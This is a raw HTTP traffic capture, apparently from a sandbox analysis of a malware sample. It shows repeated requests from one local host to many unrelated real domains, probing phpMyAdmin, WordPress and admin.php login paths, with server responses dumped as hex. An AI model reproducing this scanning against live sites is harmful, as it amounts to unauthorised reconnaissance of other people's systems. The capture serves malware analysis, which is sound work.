                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.778294086 CET281OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=6530a3599e222b6309996aa926711913
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:40.204917908 CET281OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=6530a3599e222b6309996aa926711913
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.012201071 CET281OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=6530a3599e222b6309996aa926711913
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                168192.168.2.657690178.172.160.1980
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.040899992 CET221OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ext.by
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.258677959 CET449INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:21 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 169
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://hoster.by/
                                                                                                                                                                                                                                                                                                                Server: hoster Guard
                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                169192.168.2.6577253.64.163.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.041053057 CET226OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: la-morada.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                170192.168.2.65777264.70.19.20380
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.055552006 CET224OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: fedyanin.ws
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                171192.168.2.65780664.70.19.20380
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.059118986 CET224OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: fedyanin.ws
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                172192.168.2.65774485.255.14.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.080981016 CET223OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: bokod.hu
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.296525955 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                Set-Cookie: ASP.NET_SessionId=3hbswjef1inqexnm0kk21byr; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                                                                                                                                                                                X-AspNetMvc-Version: 5.2
                                                                                                                                                                                                                                                                                                                X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 6425
                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6 23 a8 e6 6e 5f 62 a2 6c 97 93 aa 6a 9b b6 ce 56 f7 b4 c7 f2 a7 7e 9f af 5e e5 5f 7e fb 74 7a fa c5 57
                                                                                                                                                                                                                                                                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~7t.#?2[^|Q?<u{}Qz}g]il%5*fY~YLm#xkw] ph^miz@jajgOe_<>;{4}SFs/:k{e]|:Pz2kTox4zynYLbk;~EjYfuy\i}TD:?M?-Ev}M-?f8D2asnQ?>4CmbZ^nw`(@}QP@GWnPc'_{Qp;+_{e|Hx<P\)T{wTIOO=tglw}`i"[yC]0nfUo2?@9?x{o]4:+]N|oO;E{iSOkfy,~P\>?O<89j&)WZ/~DH*t&RK]F;izr_^]N>>/ASlE^y3#n_bljV~^_~tzW
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.296634912 CET1340INData Raw: bf cf ac fe 45 3f b1 7a f1 c5 2f fa ce f5 77 7f b0 bf 5d bd db b9 5c 7e f9 f6 a7 ef 3d d9 3f 79 b0 dc f9 7a 3d 9e d3 cf ec 2a 6f aa 45 7e 5f fb 7c 71 f9 8b 5e bd 5c 1c 7c ba df 7c f5 fb df fb f4 f3 ea f7 f9 bd bf 98 3f fb bd cf 4e 7e 9f 67 bf d7
                                                                                                                                                                                                                                                                                                                Data Ascii: E?z/w]\~=?yz=*oE~_|q^\||?N~g';W/^z}Nu^,VYYvzl'~ps{=w{?OfUYe3O_{==~A*?}N~/_'g'Ez|Z{
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.296647072 CET1340INData Raw: 8d 1e 93 2f 54 2f cc 9f 3e 29 bd df fd 5f e9 37 03 d5 70 21 72 1a 66 5c fe f7 9b f9 50 df 2e ab 8b ca 7e ef a6 ef 2e d0 74 b3 e0 10 a0 3f e8 77 03 84 dc e7 ed 66 b1 7d 90 06 48 fc d8 8f 49 c6 e1 ad c9 38 cc 35 e3 a0 5f df 04 6e df 01 22 84 f4 bb
                                                                                                                                                                                                                                                                                                                Data Ascii: /T/>)_7p!rf\P.~.t?wf}HI85_n"t/UDly^UMm6BvMP W).o#E-$4y72y<Y-Vd):*ic2cr()O]@L
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.296658039 CET1340INData Raw: 48 c3 40 e8 57 42 4b 20 71 14 43 c4 12 70 ff f8 9f fc 16 0d e9 6f 52 a7 04 94 7e a7 96 0a 39 85 8f 4b 7f 32 78 f9 b5 c9 48 d7 ee 3e 1c 47 c6 87 01 7e 23 d4 0d 07 4e 32 f4 b6 ad ab 65 f1 76 dd 80 c5 0a 0a 2a 48 33 0d f9 7d 45 4a d9 65 fb 02 c6 b6
                                                                                                                                                                                                                                                                                                                Data Ascii: H@WBK qCpoR~9K2xH>G~#N2ev*H3}EJeCGo4Le,od`K(i?Sg&%5}H+EJxjb<| +}Ah8cM,'NYv]I-e5NZdrR2[
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.500201941 CET1340INData Raw: 58 38 81 88 87 e8 9e 45 87 07 e9 27 39 b1 86 fe 8f fe c5 e6 8d d4 4b b4 5a 7e a7 e7 03 3b f9 47 ff 3c fa fb 1f fd ab e5 83 7f f4 2f 66 9d f3 be e0 fd e4 e8 3f fa b7 fe a3 7f 1f 7e ff 3a 70 22 b9 d0 7f f4 6f 6d fe d1 bf 98 82 be af 0f 74 30 ab f3
                                                                                                                                                                                                                                                                                                                Data Ascii: X8E'9KZ~;G</f?~:p"omt0.,GtyGjD:D{?JC1<-/_Wc<[F7aO/Y!;~J-K~BFyZ4IE6Iu7OO^_
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.500212908 CET431INData Raw: ed ea e2 e4 d3 8b 9f fa ee ab cb af de ee ed ff e4 c9 c5 77 76 de af 13 12 dd e9 5b e9 e3 e5 de a4 f9 bd d7 ed ef 73 fe fa 3b 2f 5e 5f 5d 5d 3c 5d fc 60 af 3a de 9e 9e 65 af 7e 62 ef 60 fe fb bf 7c fd fb 2c ef bd 58 fd fe 7b 07 5f f4 fa e0 7f 4c
                                                                                                                                                                                                                                                                                                                Data Ascii: wv[s;/^_]]<]`:e~b`|,X{_LGTth}?%m)g<]oStu'hBm>3Z[ekR$RFWy>{~ce*.o=y)K:sNt%wt-/4V1)5Xc(<[y.z[


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                173192.168.2.65774385.255.14.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.082525015 CET223OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: bokod.hu
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.297904968 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                Set-Cookie: ASP.NET_SessionId=wrnejr1m01rpyw0yqs1kxqt0; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                                                                                                                                                                                X-AspNetMvc-Version: 5.2
                                                                                                                                                                                                                                                                                                                X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 6425
                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6 23 a8 e6 6e 5f 62 a2 6c 97 93 aa 6a 9b b6 ce 56 f7 b4 c7 f2 a7 7e 9f af 5e e5 5f 7e fb 74 7a fa c5 57
                                                                                                                                                                                                                                                                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~7t.#?2[^|Q?<u{}Qz}g]il%5*fY~YLm#xkw] ph^miz@jajgOe_<>;{4}SFs/:k{e]|:Pz2kTox4zynYLbk;~EjYfuy\i}TD:?M?-Ev}M-?f8D2asnQ?>4CmbZ^nw`(@}QP@GWnPc'_{Qp;+_{e|Hx<P\)T{wTIOO=tglw}`i"[yC]0nfUo2?@9?x{o]4:+]N|oO;E{iSOkfy,~P\>?O<89j&)WZ/~DH*t&RK]F;izr_^]N>>/ASlE^y3#n_bljV~^_~tzW
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.298013926 CET1340INData Raw: bf cf ac fe 45 3f b1 7a f1 c5 2f fa ce f5 77 7f b0 bf 5d bd db b9 5c 7e f9 f6 a7 ef 3d d9 3f 79 b0 dc f9 7a 3d 9e d3 cf ec 2a 6f aa 45 7e 5f fb 7c 71 f9 8b 5e bd 5c 1c 7c ba df 7c f5 fb df fb f4 f3 ea f7 f9 bd bf 98 3f fb bd cf 4e 7e 9f 67 bf d7
                                                                                                                                                                                                                                                                                                                Data Ascii: E?z/w]\~=?yz=*oE~_|q^\||?N~g';W/^z}Nu^,VYYvzl'~ps{=w{?OfUYe3O_{==~A*?}N~/_'g'Ez|Z{
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.298027992 CET1340INData Raw: 8d 1e 93 2f 54 2f cc 9f 3e 29 bd df fd 5f e9 37 03 d5 70 21 72 1a 66 5c fe f7 9b f9 50 df 2e ab 8b ca 7e ef a6 ef 2e d0 74 b3 e0 10 a0 3f e8 77 03 84 dc e7 ed 66 b1 7d 90 06 48 fc d8 8f 49 c6 e1 ad c9 38 cc 35 e3 a0 5f df 04 6e df 01 22 84 f4 bb
                                                                                                                                                                                                                                                                                                                Data Ascii: /T/>)_7p!rf\P.~.t?wf}HI85_n"t/UDly^UMm6BvMP W).o#E-$4y72y<Y-Vd):*ic2cr()O]@L
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.298038960 CET1340INData Raw: 48 c3 40 e8 57 42 4b 20 71 14 43 c4 12 70 ff f8 9f fc 16 0d e9 6f 52 a7 04 94 7e a7 96 0a 39 85 8f 4b 7f 32 78 f9 b5 c9 48 d7 ee 3e 1c 47 c6 87 01 7e 23 d4 0d 07 4e 32 f4 b6 ad ab 65 f1 76 dd 80 c5 0a 0a 2a 48 33 0d f9 7d 45 4a d9 65 fb 02 c6 b6
                                                                                                                                                                                                                                                                                                                Data Ascii: H@WBK qCpoR~9K2xH>G~#N2ev*H3}EJeCGo4Le,od`K(i?Sg&%5}H+EJxjb<| +}Ah8cM,'NYv]I-e5NZdrR2[
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.503451109 CET1340INData Raw: 58 38 81 88 87 e8 9e 45 87 07 e9 27 39 b1 86 fe 8f fe c5 e6 8d d4 4b b4 5a 7e a7 e7 03 3b f9 47 ff 3c fa fb 1f fd ab e5 83 7f f4 2f 66 9d f3 be e0 fd e4 e8 3f fa b7 fe a3 7f 1f 7e ff 3a 70 22 b9 d0 7f f4 6f 6d fe d1 bf 98 82 be af 0f 74 30 ab f3
                                                                                                                                                                                                                                                                                                                Data Ascii: X8E'9KZ~;G</f?~:p"omt0.,GtyGjD:D{?JC1<-/_Wc<[F7aO/Y!;~J-K~BFyZ4IE6Iu7OO^_
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.503473043 CET431INData Raw: ed ea e2 e4 d3 8b 9f fa ee ab cb af de ee ed ff e4 c9 c5 77 76 de af 13 12 dd e9 5b e9 e3 e5 de a4 f9 bd d7 ed ef 73 fe fa 3b 2f 5e 5f 5d 5d 3c 5d fc 60 af 3a de 9e 9e 65 af 7e 62 ef 60 fe fb bf 7c fd fb 2c ef bd 58 fd fe 7b 07 5f f4 fa e0 7f 4c
                                                                                                                                                                                                                                                                                                                Data Ascii: wv[s;/^_]]<]`:e~b`|,X{_LGTth}?%m)g<]oStu'hBm>3Z[ekR$RFWy>{~ce*.o=y)K:sNt%wt-/4V1)5Xc(<[y.z[


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                174192.168.2.6578093.64.163.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.087343931 CET226OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: la-morada.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                175192.168.2.657745178.172.160.1980
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.096772909 CET221OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ext.by
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.311817884 CET449INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:21 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 169
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://hoster.by/
                                                                                                                                                                                                                                                                                                                Server: hoster Guard
                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
